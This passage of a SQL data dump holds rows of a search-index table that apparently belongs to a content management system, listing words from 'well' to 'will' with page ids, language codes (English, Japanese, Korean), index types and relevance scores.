('well', 39, 'en', 'help_search', 1),
('well', 39, 'ja', 'help_search', 1),
('well', 39, 'ko', 'help_search', 1),
('well', 69, 'en', 'help_search', 1),
('well', 69, 'en', 'node_search', 1),
('well', 69, 'ja', 'help_search', 1),
('well', 69, 'ko', 'help_search', 1),
('wellbeing', 188, 'en', 'node_search', 1),
('went', 3, 'en', 'node_search', 1),
('went', 3, 'ko', 'node_search', 1),
('went', 70, 'en', 'help_search', 1),
('went', 70, 'ja', 'help_search', 1),
('went', 70, 'ko', 'help_search', 1),
('were', 3, 'en', 'node_search', 1),
('were', 3, 'ko', 'node_search', 1),
('were', 71, 'en', 'help_search', 2),
('were', 71, 'ja', 'help_search', 2),
('were', 71, 'ko', 'help_search', 2),
('were', 72, 'en', 'help_search', 1.84528),
('were', 72, 'ja', 'help_search', 1.84528),
('were', 72, 'ko', 'help_search', 1.84528),
('were', 74, 'en', 'help_search', 2),
('were', 74, 'ja', 'help_search', 2),
('were', 74, 'ko', 'help_search', 2),
('were', 77, 'en', 'node_search', 4),
('were', 86, 'en', 'help_search', 0.953396),
('were', 86, 'ja', 'help_search', 0.953396),
('were', 86, 'ko', 'help_search', 0.953396),
('were', 87, 'en', 'node_search', 1),
('wget', 32, 'en', 'help_search', 4),
('wget', 32, 'ja', 'help_search', 4),
('wget', 32, 'ko', 'help_search', 4),
('what', 2, 'en', 'help_search', 76),
('what', 2, 'ja', 'help_search', 76),
('what', 2, 'ko', 'help_search', 76),
('what', 6, 'en', 'help_search', 76),
('what', 6, 'en', 'node_search', 3),
('what', 6, 'ja', 'help_search', 76),
('what', 6, 'ko', 'help_search', 76),
('what', 11, 'en', 'help_search', 57),
('what', 11, 'ja', 'help_search', 57),
('what', 11, 'ko', 'help_search', 57),
('what', 17, 'en', 'help_search', 19),
('what', 17, 'ja', 'help_search', 19),
('what', 17, 'ko', 'help_search', 19),
('what', 20, 'en', 'help_search', 19),
('what', 20, 'ja', 'help_search', 19),
('what', 20, 'ko', 'help_search', 19),
('what', 22, 'en', 'help_search', 19),
('what', 22, 'ja', 'help_search', 19),
('what', 22, 'ko', 'help_search', 19),
('what', 23, 'en', 'help_search', 27.8995),
('what', 23, 'ja', 'help_search', 27.8995),
('what', 23, 'ko', 'help_search', 27.8995),
('what', 24, 'en', 'help_search', 1),
('what', 24, 'ja', 'help_search', 1),
('what', 24, 'ko', 'help_search', 1),
('what', 28, 'en', 'help_search', 38),
('what', 28, 'ja', 'help_search', 38),
('what', 28, 'ko', 'help_search', 38),
('what', 29, 'en', 'help_search', 57),
('what', 29, 'ja', 'help_search', 57),
('what', 29, 'ko', 'help_search', 57),
('what', 30, 'en', 'help_search', 74.418),
('what', 30, 'ja', 'help_search', 74.418),
('what', 30, 'ko', 'help_search', 74.418),
('what', 31, 'ja', 'help_search', 146.382),
('what', 32, 'en', 'help_search', 38),
('what', 32, 'ja', 'help_search', 38),
('what', 32, 'ko', 'help_search', 38),
('what', 33, 'en', 'help_search', 57),
('what', 33, 'ja', 'help_search', 57),
('what', 33, 'ko', 'help_search', 57),
('what', 35, 'en', 'help_search', 57),
('what', 35, 'ja', 'help_search', 57),
('what', 35, 'ko', 'help_search', 57),
('what', 36, 'en', 'help_search', 19),
('what', 36, 'ja', 'help_search', 19),
('what', 36, 'ko', 'help_search', 19),
('what', 37, 'en', 'help_search', 76),
('what', 37, 'ja', 'help_search', 76),
('what', 37, 'ko', 'help_search', 76),
('what', 38, 'en', 'help_search', 38),
('what', 38, 'ja', 'help_search', 38),
('what', 38, 'ko', 'help_search', 38),
('what', 39, 'en', 'help_search', 19),
('what', 39, 'ja', 'help_search', 19),
('what', 39, 'ko', 'help_search', 19),
('what', 41, 'en', 'help_search', 19),
('what', 41, 'ja', 'help_search', 19),
('what', 41, 'ko', 'help_search', 19),
('what', 43, 'en', 'help_search', 38),
('what', 43, 'ja', 'help_search', 38),
('what', 43, 'ko', 'help_search', 38),
('what', 44, 'en', 'help_search', 76),
('what', 44, 'ja', 'help_search', 76),
('what', 44, 'ko', 'help_search', 76),
('what', 46, 'en', 'help_search', 19),
('what', 46, 'ja', 'help_search', 19),
('what', 46, 'ko', 'help_search', 19),
('what', 47, 'en', 'help_search', 38),
('what', 47, 'ja', 'help_search', 38),
('what', 47, 'ko', 'help_search', 38),
('what', 50, 'en', 'help_search', 40),
('what', 50, 'ja', 'help_search', 40),
('what', 50, 'ko', 'help_search', 40),
('what', 62, 'en', 'help_search', 38),
('what', 62, 'en', 'node_search', 1),
('what', 62, 'ja', 'help_search', 38),
('what', 62, 'ko', 'help_search', 38),
('what', 65, 'en', 'help_search', 57),
('what', 65, 'ja', 'help_search', 57),
('what', 65, 'ko', 'help_search', 57),
('what', 67, 'en', 'help_search', 19),
('what', 67, 'ja', 'help_search', 19),
('what', 67, 'ko', 'help_search', 19),
('what', 68, 'en', 'help_search', 74.7594),
('what', 68, 'ja', 'help_search', 74.7594),
('what', 68, 'ko', 'help_search', 74.7594),
('what', 69, 'en', 'help_search', 19),
('what', 69, 'ja', 'help_search', 19),
('what', 69, 'ko', 'help_search', 19),
('what', 70, 'en', 'help_search', 19),
('what', 70, 'ja', 'help_search', 19),
('what', 70, 'ko', 'help_search', 19),
('what', 71, 'en', 'help_search', 1),
('what', 71, 'ja', 'help_search', 1),
('what', 71, 'ko', 'help_search', 1),
('what', 72, 'en', 'help_search', 39),
('what', 72, 'ja', 'help_search', 39),
('what', 72, 'ko', 'help_search', 39),
('what', 73, 'en', 'help_search', 19),
('what', 73, 'ja', 'help_search', 19),
('what', 73, 'ko', 'help_search', 19),
('what', 80, 'en', 'help_search', 19),
('what', 80, 'ja', 'help_search', 19),
('what', 80, 'ko', 'help_search', 19),
('what', 81, 'en', 'help_search', 19),
('what', 81, 'ja', 'help_search', 19),
('what', 81, 'ko', 'help_search', 19),
('what', 84, 'en', 'help_search', 57),
('what', 84, 'ja', 'help_search', 57),
('what', 84, 'ko', 'help_search', 57),
('what', 86, 'en', 'help_search', 39.989),
('what', 86, 'ja', 'help_search', 39.989),
('what', 86, 'ko', 'help_search', 39.989),
('what', 87, 'en', 'help_search', 1),
('what', 87, 'en', 'node_search', 1),
('what', 87, 'ja', 'help_search', 1),
('what', 87, 'ko', 'help_search', 1),
('what', 91, 'en', 'help_search', 1),
('what', 91, 'ja', 'help_search', 1),
('what', 91, 'ko', 'help_search', 1),
('what', 93, 'en', 'help_search', 58.4225),
('what', 93, 'ja', 'help_search', 58.4225),
('what', 93, 'ko', 'help_search', 58.4225),
('wheelchair', 162, 'en', 'node_search', 1),
('when', 1, 'en', 'help_search', 1),
('when', 1, 'ja', 'help_search', 1),
('when', 1, 'ko', 'help_search', 1),
('when', 2, 'en', 'help_search', 1),
('when', 2, 'ja', 'help_search', 1),
('when', 2, 'ko', 'help_search', 1),
('when', 6, 'en', 'help_search', 3),
('when', 6, 'ja', 'help_search', 3),
('when', 6, 'ko', 'help_search', 3),
('when', 20, 'en', 'help_search', 1),
('when', 20, 'ja', 'help_search', 1),
('when', 20, 'ko', 'help_search', 1),
('when', 23, 'en', 'help_search', 1.98902),
('when', 23, 'ja', 'help_search', 1.98902),
('when', 23, 'ko', 'help_search', 1.98902),
('when', 24, 'en', 'help_search', 1),
('when', 24, 'en', 'node_search', 1),
('when', 24, 'ja', 'help_search', 1),
('when', 24, 'ko', 'help_search', 1),
('when', 25, 'ja', 'help_search', 1),
('when', 26, 'en', 'help_search', 1),
('when', 26, 'ja', 'help_search', 1),
('when', 26, 'ko', 'help_search', 1),
('when', 27, 'en', 'help_search', 1),
('when', 27, 'ja', 'help_search', 1),
('when', 27, 'ko', 'help_search', 1),
('when', 28, 'en', 'help_search', 2),
('when', 28, 'ja', 'help_search', 2),
('when', 28, 'ko', 'help_search', 2),
('when', 29, 'en', 'node_search', 3),
('when', 30, 'en', 'help_search', 5.92719),
('when', 30, 'ja', 'help_search', 5.92719),
('when', 30, 'ko', 'help_search', 5.92719),
('when', 31, 'ja', 'help_search', 1.6112),
('when', 34, 'en', 'help_search', 1),
('when', 34, 'ja', 'help_search', 1),
('when', 34, 'ko', 'help_search', 1),
('when', 37, 'en', 'help_search', 2.9496),
('when', 37, 'ja', 'help_search', 2.9496),
('when', 37, 'ko', 'help_search', 2.9496),
('when', 38, 'en', 'help_search', 1),
('when', 38, 'ja', 'help_search', 1),
('when', 38, 'ko', 'help_search', 1),
('when', 42, 'en', 'help_search', 1),
('when', 42, 'ja', 'help_search', 1),
('when', 42, 'ko', 'help_search', 1),
('when', 45, 'en', 'help_search', 1),
('when', 45, 'ja', 'help_search', 1),
('when', 45, 'ko', 'help_search', 1),
('when', 46, 'en', 'help_search', 3),
('when', 46, 'ja', 'help_search', 3),
('when', 46, 'ko', 'help_search', 3),
('when', 47, 'en', 'help_search', 1),
('when', 47, 'ja', 'help_search', 1),
('when', 47, 'ko', 'help_search', 1),
('when', 49, 'en', 'help_search', 1),
('when', 49, 'ja', 'help_search', 1),
('when', 49, 'ko', 'help_search', 1),
('when', 55, 'en', 'help_search', 1),
('when', 55, 'ja', 'help_search', 1),
('when', 55, 'ko', 'help_search', 1),
('when', 56, 'en', 'help_search', 3),
('when', 56, 'ja', 'help_search', 3),
('when', 56, 'ko', 'help_search', 3),
('when', 59, 'en', 'help_search', 1),
('when', 59, 'ja', 'help_search', 1),
('when', 59, 'ko', 'help_search', 1),
('when', 66, 'en', 'node_search', 1),
('when', 67, 'en', 'help_search', 3),
('when', 67, 'ja', 'help_search', 3),
('when', 67, 'ko', 'help_search', 3),
('when', 68, 'en', 'help_search', 1.8861),
('when', 68, 'ja', 'help_search', 1.8861),
('when', 68, 'ko', 'help_search', 1.8861),
('when', 69, 'en', 'help_search', 1),
('when', 69, 'ja', 'help_search', 1),
('when', 69, 'ko', 'help_search', 1),
('when', 70, 'en', 'help_search', 4),
('when', 70, 'ja', 'help_search', 4),
('when', 70, 'ko', 'help_search', 4),
('when', 72, 'en', 'help_search', 2),
('when', 72, 'ja', 'help_search', 2),
('when', 72, 'ko', 'help_search', 2),
('when', 73, 'en', 'help_search', 6),
('when', 73, 'ja', 'help_search', 6),
('when', 73, 'ko', 'help_search', 6),
('when', 75, 'en', 'help_search', 1),
('when', 75, 'ja', 'help_search', 1),
('when', 75, 'ko', 'help_search', 1),
('when', 80, 'en', 'help_search', 2),
('when', 80, 'ja', 'help_search', 2),
('when', 80, 'ko', 'help_search', 2),
('when', 86, 'en', 'help_search', 3),
('when', 86, 'ja', 'help_search', 3),
('when', 86, 'ko', 'help_search', 3),
('when', 87, 'en', 'node_search', 1),
('when', 91, 'en', 'help_search', 2),
('when', 91, 'ja', 'help_search', 2),
('when', 91, 'ko', 'help_search', 2),
('when', 92, 'en', 'help_search', 3),
('when', 92, 'ja', 'help_search', 3),
('when', 92, 'ko', 'help_search', 3),
('when', 93, 'en', 'help_search', 1),
('when', 93, 'ja', 'help_search', 1),
('when', 93, 'ko', 'help_search', 1),
('whenever', 45, 'en', 'help_search', 1),
('whenever', 45, 'ja', 'help_search', 1),
('whenever', 45, 'ko', 'help_search', 1),
('where', 1, 'en', 'help_search', 2),
('where', 1, 'ja', 'help_search', 2),
('where', 1, 'ko', 'help_search', 2),
('where', 3, 'en', 'help_search', 1),
('where', 3, 'ja', 'help_search', 1),
('where', 3, 'ko', 'help_search', 1),
('where', 11, 'en', 'help_search', 1),
('where', 11, 'ja', 'help_search', 1),
('where', 11, 'ko', 'help_search', 1),
('where', 29, 'en', 'help_search', 1),
('where', 29, 'ja', 'help_search', 1),
('where', 29, 'ko', 'help_search', 1),
('where', 32, 'en', 'help_search', 1),
('where', 32, 'ja', 'help_search', 1),
('where', 32, 'ko', 'help_search', 1),
('where', 46, 'en', 'help_search', 19),
('where', 46, 'ja', 'help_search', 19),
('where', 46, 'ko', 'help_search', 19),
('where', 86, 'en', 'help_search', 1),
('where', 86, 'ja', 'help_search', 1),
('where', 86, 'ko', 'help_search', 1),
('where', 93, 'en', 'help_search', 1),
('where', 93, 'ja', 'help_search', 1),
('where', 93, 'ko', 'help_search', 1),
('where', 120, 'en', 'node_search', 1),
('where', 136, 'en', 'node_search', 1),
('where', 190, 'en', 'node_search', 1),
('whether', 7, 'en', 'help_search', 3.95793),
('whether', 7, 'ja', 'help_search', 3.95793),
('whether', 7, 'ko', 'help_search', 3.95793),
('whether', 31, 'ja', 'help_search', 1),
('whether', 62, 'en', 'node_search', 1),
('whether', 66, 'en', 'node_search', 0.997306),
('whether', 93, 'en', 'help_search', 2),
('whether', 93, 'ja', 'help_search', 2),
('whether', 93, 'ko', 'help_search', 2),
('which', 2, 'en', 'help_search', 1),
('which', 2, 'ja', 'help_search', 1),
('which', 2, 'ko', 'help_search', 1),
('which', 4, 'en', 'help_search', 1),
('which', 4, 'ja', 'help_search', 1),
('which', 4, 'ko', 'help_search', 1),
('which', 6, 'en', 'help_search', 2),
('which', 6, 'ja', 'help_search', 2),
('which', 6, 'ko', 'help_search', 2),
('which', 8, 'en', 'help_search', 1),
('which', 8, 'ja', 'help_search', 1),
('which', 8, 'ko', 'help_search', 1),
('which', 10, 'en', 'help_search', 1),
('which', 10, 'ja', 'help_search', 1),
('which', 10, 'ko', 'help_search', 1),
('which', 11, 'en', 'help_search', 2),
('which', 11, 'ja', 'help_search', 2),
('which', 11, 'ko', 'help_search', 2),
('which', 18, 'en', 'help_search', 2),
('which', 18, 'ja', 'help_search', 2),
('which', 18, 'ko', 'help_search', 2),
('which', 20, 'en', 'help_search', 3),
('which', 20, 'ja', 'help_search', 3),
('which', 20, 'ko', 'help_search', 3),
('which', 22, 'en', 'help_search', 1),
('which', 22, 'ja', 'help_search', 1),
('which', 22, 'ko', 'help_search', 1),
('which', 23, 'en', 'help_search', 2),
('which', 23, 'ja', 'help_search', 2),
('which', 23, 'ko', 'help_search', 2),
('which', 24, 'en', 'help_search', 2),
('which', 24, 'ja', 'help_search', 2),
('which', 24, 'ko', 'help_search', 2),
('which', 27, 'en', 'help_search', 1),
('which', 27, 'ja', 'help_search', 1),
('which', 27, 'ko', 'help_search', 1),
('which', 28, 'en', 'help_search', 1.78178),
('which', 28, 'ja', 'help_search', 1.78178),
('which', 28, 'ko', 'help_search', 1.78178),
('which', 29, 'en', 'help_search', 1),
('which', 29, 'ja', 'help_search', 1),
('which', 29, 'ko', 'help_search', 1),
('which', 30, 'en', 'help_search', 2.64632),
('which', 30, 'ja', 'help_search', 2.64632),
('which', 30, 'ko', 'help_search', 2.64632),
('which', 31, 'ja', 'help_search', 5.65326),
('which', 32, 'en', 'help_search', 1),
('which', 32, 'ja', 'help_search', 1),
('which', 32, 'ko', 'help_search', 1),
('which', 35, 'en', 'help_search', 1),
('which', 35, 'ja', 'help_search', 1),
('which', 35, 'ko', 'help_search', 1),
('which', 37, 'en', 'help_search', 1),
('which', 37, 'ja', 'help_search', 1),
('which', 37, 'ko', 'help_search', 1),
('which', 43, 'en', 'help_search', 3),
('which', 43, 'ja', 'help_search', 3),
('which', 43, 'ko', 'help_search', 3),
('which', 46, 'en', 'help_search', 1),
('which', 46, 'ja', 'help_search', 1),
('which', 46, 'ko', 'help_search', 1),
('which', 47, 'en', 'help_search', 28),
('which', 47, 'ja', 'help_search', 28),
('which', 47, 'ko', 'help_search', 28),
('which', 48, 'en', 'help_search', 1),
('which', 48, 'ja', 'help_search', 1),
('which', 48, 'ko', 'help_search', 1),
('which', 50, 'en', 'help_search', 3),
('which', 50, 'ja', 'help_search', 3),
('which', 50, 'ko', 'help_search', 3),
('which', 56, 'en', 'help_search', 1),
('which', 56, 'ja', 'help_search', 1),
('which', 56, 'ko', 'help_search', 1),
('which', 57, 'en', 'help_search', 3),
('which', 57, 'ja', 'help_search', 3),
('which', 57, 'ko', 'help_search', 3),
('which', 59, 'en', 'help_search', 1),
('which', 59, 'ja', 'help_search', 1),
('which', 59, 'ko', 'help_search', 1),
('which', 60, 'en', 'help_search', 1),
('which', 60, 'ja', 'help_search', 1),
('which', 60, 'ko', 'help_search', 1),
('which', 62, 'en', 'help_search', 2),
('which', 62, 'ja', 'help_search', 2),
('which', 62, 'ko', 'help_search', 2),
('which', 65, 'en', 'help_search', 3),
('which', 65, 'ja', 'help_search', 3),
('which', 65, 'ko', 'help_search', 3),
('which', 67, 'en', 'help_search', 1),
('which', 67, 'ja', 'help_search', 1),
('which', 67, 'ko', 'help_search', 1),
('which', 68, 'en', 'help_search', 1.9689),
('which', 68, 'ja', 'help_search', 1.9689),
('which', 68, 'ko', 'help_search', 1.9689),
('which', 69, 'en', 'help_search', 2),
('which', 69, 'ja', 'help_search', 2),
('which', 69, 'ko', 'help_search', 2),
('which', 75, 'en', 'help_search', 1),
('which', 75, 'ja', 'help_search', 1),
('which', 75, 'ko', 'help_search', 1),
('which', 76, 'en', 'help_search', 1),
('which', 76, 'ja', 'help_search', 1),
('which', 76, 'ko', 'help_search', 1),
('which', 77, 'en', 'help_search', 1),
('which', 77, 'ja', 'help_search', 1),
('which', 77, 'ko', 'help_search', 1),
('which', 79, 'en', 'help_search', 1),
('which', 79, 'ja', 'help_search', 1),
('which', 79, 'ko', 'help_search', 1),
('which', 80, 'en', 'help_search', 1),
('which', 80, 'ja', 'help_search', 1),
('which', 80, 'ko', 'help_search', 1),
('which', 81, 'en', 'help_search', 1),
('which', 81, 'ja', 'help_search', 1),
('which', 81, 'ko', 'help_search', 1),
('which', 84, 'en', 'help_search', 1),
('which', 84, 'ja', 'help_search', 1),
('which', 84, 'ko', 'help_search', 1),
('which', 89, 'en', 'help_search', 1),
('which', 89, 'ja', 'help_search', 1),
('which', 89, 'ko', 'help_search', 1),
('which', 90, 'en', 'help_search', 1),
('which', 90, 'ja', 'help_search', 1),
('which', 90, 'ko', 'help_search', 1),
('which', 93, 'en', 'help_search', 3.85439),
('which', 93, 'ja', 'help_search', 3.85439),
('which', 93, 'ko', 'help_search', 3.85439),
('while', 22, 'en', 'help_search', 1),
('while', 22, 'ja', 'help_search', 1),
('while', 22, 'ko', 'help_search', 1),
('while', 23, 'en', 'node_search', 0.845322),
('while', 36, 'en', 'help_search', 1),
('while', 36, 'ja', 'help_search', 1),
('while', 36, 'ko', 'help_search', 1),
('while', 66, 'en', 'help_search', 1),
('while', 66, 'ja', 'help_search', 1),
('while', 77, 'en', 'node_search', 4),
('while', 80, 'en', 'help_search', 1),
('while', 80, 'ja', 'help_search', 1),
('while', 80, 'ko', 'help_search', 1),
('while', 87, 'en', 'node_search', 28),
('while', 87, 'ja', 'node_search', 27.5732),
('while', 142, 'en', 'node_search', 1),
('while', 167, 'en', 'node_search', 1),
('while', 169, 'en', 'node_search', 1),
('while', 195, 'en', 'node_search', 1),
('white', 72, 'en', 'help_search', 4),
('white', 72, 'ja', 'help_search', 4),
('white', 72, 'ko', 'help_search', 4),
('who', 3, 'en', 'node_search', 46),
('who', 3, 'ko', 'node_search', 46),
('who', 4, 'en', 'node_search', 3),
('who', 4, 'ja', 'node_search', 3),
('who', 5, 'en', 'node_search', 29),
('who', 5, 'ko', 'node_search', 29),
('who', 7, 'en', 'help_search', 19),
('who', 7, 'en', 'node_search', 2),
('who', 7, 'ja', 'help_search', 19),
('who', 7, 'ko', 'help_search', 19),
('who', 7, 'ko', 'node_search', 2),
('who', 8, 'en', 'help_search', 19),
('who', 8, 'en', 'node_search', 27),
('who', 8, 'ja', 'help_search', 19),
('who', 8, 'ko', 'help_search', 19),
('who', 9, 'en', 'help_search', 19),
('who', 9, 'ja', 'help_search', 19),
('who', 9, 'ko', 'help_search', 19),
('who', 10, 'en', 'help_search', 19),
('who', 10, 'en', 'node_search', 28),
('who', 10, 'ja', 'help_search', 19),
('who', 10, 'ko', 'help_search', 19),
('who', 10, 'ko', 'node_search', 28),
('who', 18, 'en', 'node_search', 1),
('who', 18, 'ko', 'node_search', 1),
('who', 23, 'en', 'node_search', 1.83446),
('who', 24, 'en', 'node_search', 9.13384),
('who', 26, 'en', 'node_search', 1),
('who', 28, 'en', 'help_search', 1),
('who', 28, 'en', 'node_search', 3),
('who', 28, 'ja', 'help_search', 1),
('who', 28, 'ko', 'help_search', 1),
('who', 31, 'en', 'node_search', 30),
('who', 37, 'en', 'help_search', 1),
('who', 37, 'ja', 'help_search', 1),
('who', 37, 'ko', 'help_search', 1),
('who', 39, 'en', 'help_search', 19),
('who', 39, 'ja', 'help_search', 19),
('who', 39, 'ko', 'help_search', 19),
('who', 59, 'en', 'help_search', 19),
('who', 59, 'ja', 'help_search', 19),
('who', 59, 'ko', 'help_search', 19),
('who', 60, 'en', 'help_search', 19),
('who', 60, 'ja', 'help_search', 19),
('who', 60, 'ko', 'help_search', 19),
('who', 61, 'en', 'help_search', 19),
('who', 61, 'ja', 'help_search', 19),
('who', 61, 'ko', 'help_search', 19),
('who', 63, 'en', 'help_search', 19),
('who', 63, 'ja', 'help_search', 19),
('who', 63, 'ko', 'help_search', 19),
('who', 64, 'en', 'help_search', 19),
('who', 64, 'ja', 'help_search', 19),
('who', 64, 'ko', 'help_search', 19),
('who', 66, 'en', 'node_search', 1),
('who', 67, 'ja', 'node_search', 1),
('who', 69, 'en', 'node_search', 2),
('who', 73, 'en', 'help_search', 1),
('who', 73, 'ja', 'help_search', 1),
('who', 73, 'ko', 'help_search', 1),
('who', 77, 'en', 'node_search', 4),
('who', 79, 'en', 'help_search', 19),
('who', 79, 'ja', 'help_search', 19),
('who', 79, 'ko', 'help_search', 19),
('who', 84, 'en', 'help_search', 3),
('who', 84, 'ja', 'help_search', 3),
('who', 84, 'ko', 'help_search', 3),
('who', 87, 'en', 'node_search', 1),
('who', 89, 'en', 'help_search', 20),
('who', 89, 'ja', 'help_search', 19.9973),
('who', 89, 'ko', 'help_search', 20),
('who', 93, 'en', 'help_search', 0.879565),
('who', 93, 'ja', 'help_search', 0.879565),
('who', 93, 'ko', 'help_search', 0.879565),
('who', 126, 'en', 'node_search', 1),
('who', 133, 'en', 'node_search', 1),
('who', 136, 'en', 'node_search', 2),
('who', 140, 'en', 'node_search', 1),
('who', 142, 'en', 'node_search', 1),
('who', 155, 'en', 'node_search', 2),
('who', 191, 'en', 'node_search', 1),
('whole', 92, 'en', 'help_search', 1),
('whole', 92, 'ja', 'help_search', 1),
('whole', 92, 'ko', 'help_search', 1),
('whose', 2, 'en', 'help_search', 1),
('whose', 2, 'ja', 'help_search', 1),
('whose', 2, 'ko', 'help_search', 1),
('whose', 20, 'en', 'help_search', 1),
('whose', 20, 'ja', 'help_search', 1),
('whose', 20, 'ko', 'help_search', 1),
('whose', 65, 'en', 'help_search', 1),
('whose', 65, 'ja', 'help_search', 1),
('whose', 65, 'ko', 'help_search', 1),
('whose', 91, 'en', 'help_search', 1),
('whose', 91, 'ja', 'help_search', 1),
('whose', 91, 'ko', 'help_search', 1),
('why', 66, 'en', 'node_search', 4),
('why', 74, 'en', 'help_search', 1),
('why', 74, 'ja', 'help_search', 1),
('why', 74, 'ko', 'help_search', 1),
('widelyused', 23, 'en', 'help_search', 1),
('widelyused', 23, 'ja', 'help_search', 1),
('widelyused', 23, 'ko', 'help_search', 1),
('widget', 26, 'en', 'help_search', 7),
('widget', 26, 'ja', 'help_search', 7),
('widget', 26, 'ko', 'help_search', 7),
('widget', 35, 'en', 'help_search', 4),
('widget', 35, 'ja', 'help_search', 4),
('widget', 35, 'ko', 'help_search', 4),
('widgets', 26, 'en', 'help_search', 5),
('widgets', 26, 'ja', 'help_search', 5),
('widgets', 26, 'ko', 'help_search', 5),
('width', 6, 'en', 'help_search', 30),
('width', 6, 'ja', 'help_search', 30),
('width', 6, 'ko', 'help_search', 30),
('width', 35, 'en', 'help_search', 1),
('width', 35, 'ja', 'help_search', 1),
('width', 35, 'ko', 'help_search', 1),
('width', 48, 'en', 'help_search', 4),
('width', 48, 'ja', 'help_search', 4),
('width', 48, 'ko', 'help_search', 4),
('widths', 6, 'en', 'help_search', 2),
('widths', 6, 'ja', 'help_search', 2),
('widths', 6, 'ko', 'help_search', 2),
('will', 1, 'en', 'help_search', 1),
('will', 1, 'ja', 'help_search', 1),
('will', 1, 'ko', 'help_search', 1),
('will', 3, 'en', 'help_search', 2),
('will', 3, 'en', 'node_search', 2),
('will', 3, 'ja', 'help_search', 2),
('will', 3, 'ko', 'help_search', 2),
('will', 3, 'ko', 'node_search', 2),
('will', 5, 'en', 'help_search', 1),
('will', 5, 'ja', 'help_search', 1),
('will', 5, 'ko', 'help_search', 1),
('will', 6, 'en', 'help_search', 1),
('will', 6, 'ja', 'help_search', 1),
('will', 6, 'ko', 'help_search', 1),
('will', 7, 'en', 'help_search', 1.98087),
('will', 7, 'ja', 'help_search', 1.98087),
('will', 7, 'ko', 'help_search', 1.98087),
('will', 8, 'en', 'help_search', 2),
('will', 8, 'ja', 'help_search', 2),
('will', 8, 'ko', 'help_search', 2),
('will', 9, 'en', 'help_search', 3),
('will', 9, 'ja', 'help_search', 3),
('will', 9, 'ko', 'help_search', 3),
('will', 10, 'en', 'help_search', 1),
('will', 10, 'ja', 'help_search', 1),
('will', 10, 'ko', 'help_search', 1),
('will', 14, 'en', 'help_search', 2),
('will', 14, 'ja', 'help_search', 2),
('will', 14, 'ko', 'help_search', 2),
('will', 17, 'en', 'help_search', 1),
('will', 17, 'ja', 'help_search', 1),
('will', 17, 'ko', 'help_search', 1),
('will', 18, 'en', 'help_search', 1),
('will', 18, 'ja', 'help_search', 1),
('will', 18, 'ko', 'help_search', 1),
('will', 19, 'en', 'help_search', 1),
('will', 19, 'ja', 'help_search', 1),
('will', 19, 'ko', 'help_search', 1),
('will', 20, 'en', 'help_search', 1),
('will', 20, 'ja', 'help_search', 1),
('will', 20, 'ko', 'help_search', 1),
('will', 22, 'en', 'help_search', 2),
('will', 22, 'ja', 'help_search', 2),
('will', 22, 'ko', 'help_search', 2),
('will', 23, 'en', 'help_search', 2.68852),
('will', 23, 'ja', 'help_search', 2.68852),
('will', 23, 'ko', 'help_search', 2.68852),
('will', 24, 'en', 'node_search', 0.800068),
('will', 25, 'ja', 'help_search', 1),
('will', 27, 'en', 'help_search', 2),
('will', 27, 'ja', 'help_search', 2),
('will', 27, 'ko', 'help_search', 2),
('will', 28, 'en', 'help_search', 1.72016),
('will', 28, 'ja', 'help_search', 1.72016),
('will', 28, 'ko', 'help_search', 1.72016),
('will', 30, 'en', 'help_search', 1.67852),
('will', 30, 'ja', 'help_search', 1.67852),
('will', 30, 'ko', 'help_search', 1.67852),
('will', 31, 'en', 'node_search', 4.87271),
('will', 32, 'en', 'help_search', 2),
('will', 32, 'ja', 'help_search', 2),
('will', 32, 'ko', 'help_search', 2),
('will', 37, 'en', 'help_search', 1.86679),
('will', 37, 'ja', 'help_search', 1.86679),
('will', 37, 'ko', 'help_search', 1.86679),
('will', 38, 'en', 'help_search', 1),
('will', 38, 'ja', 'help_search', 1),
('will', 38, 'ko', 'help_search', 1),
('will', 39, 'en', 'help_search', 2),
('will', 39, 'ja', 'help_search', 2),
('will', 39, 'ko', 'help_search', 2),
('will', 43, 'en', 'help_search', 1),
('will', 43, 'ja', 'help_search', 1),
('will', 43, 'ko', 'help_search', 1),
('will', 46, 'en', 'help_search', 2.96109),
('will', 46, 'ja', 'help_search', 2.96109),
('will', 46, 'ko', 'help_search', 2.96109),
('will', 50, 'en', 'help_search', 2),
('will', 50, 'ja', 'help_search', 2),
('will', 50, 'ko', 'help_search', 2),
('will', 54, 'en', 'help_search', 1),
('will', 54, 'ja', 'help_search', 1),
('will', 54, 'ko', 'help_search', 1),
('will', 55, 'en', 'help_search', 1),
('will', 55, 'ja', 'help_search', 1),
('will', 55, 'ko', 'help_search', 1),
('will', 56, 'en', 'help_search', 3),
('will', 56, 'ja', 'help_search', 3),
('will', 56, 'ko', 'help_search', 3),
('will', 57, 'en', 'help_search', 1),
('will', 57, 'ja', 'help_search', 1),
('will', 57, 'ko', 'help_search', 1),
('will', 59, 'en', 'help_search', 2),
('will', 59, 'ja', 'help_search', 2),
('will', 59, 'ko', 'help_search', 2),
('will', 60, 'en', 'help_search', 4),
('will', 60, 'ja', 'help_search', 4),
('will', 60, 'ko', 'help_search', 4),
('will', 63, 'en', 'help_search', 1),
('will', 63, 'ja', 'help_search', 1),
('will', 63, 'ko', 'help_search', 1),
('will', 64, 'en', 'help_search', 2),
('will', 64, 'ja', 'help_search', 2),
('will', 64, 'ko', 'help_search', 2),
('will', 65, 'en', 'help_search', 1),
('will', 65, 'ja', 'help_search', 1),
('will', 65, 'ko', 'help_search', 1),
('will', 66, 'en', 'help_search', 2),
('will', 66, 'ja', 'help_search', 2),
('will', 67, 'en', 'help_search', 3),
('will', 67, 'ja', 'help_search', 3),
('will', 67, 'ko', 'help_search', 3),
('will', 68, 'en', 'help_search', 5.57006),
('will', 68, 'ja', 'help_search', 5.57006),
('will', 68, 'ko', 'help_search', 5.57006),
('will', 69, 'en', 'help_search', 1),
('will', 69, 'en', 'node_search', 1),
('will', 69, 'ja', 'help_search', 1),
('will', 69, 'ko', 'help_search', 1),
('will', 70, 'en', 'help_search', 1),
('will', 70, 'ja', 'help_search', 1),
('will', 70, 'ko', 'help_search', 1),
('will', 72, 'en', 'help_search', 1),
('will', 72, 'ja', 'help_search', 1),
('will', 72, 'ko', 'help_search', 1),
('will', 73, 'en', 'help_search', 5),
('will', 73, 'ja', 'help_search', 5),
('will', 73, 'ko', 'help_search', 5),
('will', 76, 'en', 'help_search', 1),
('will', 76, 'ja', 'help_search', 1),
('will', 76, 'ko', 'help_search', 1),
('will', 77, 'en', 'node_search', 4),
('will', 79, 'en', 'help_search', 6),
('will', 79, 'ja', 'help_search', 6),
('will', 79, 'ko', 'help_search', 6),
('will', 80, 'en', 'help_search', 0.989021),
('will', 80, 'ja', 'help_search', 0.989021),
('will', 80, 'ko', 'help_search', 0.989021),
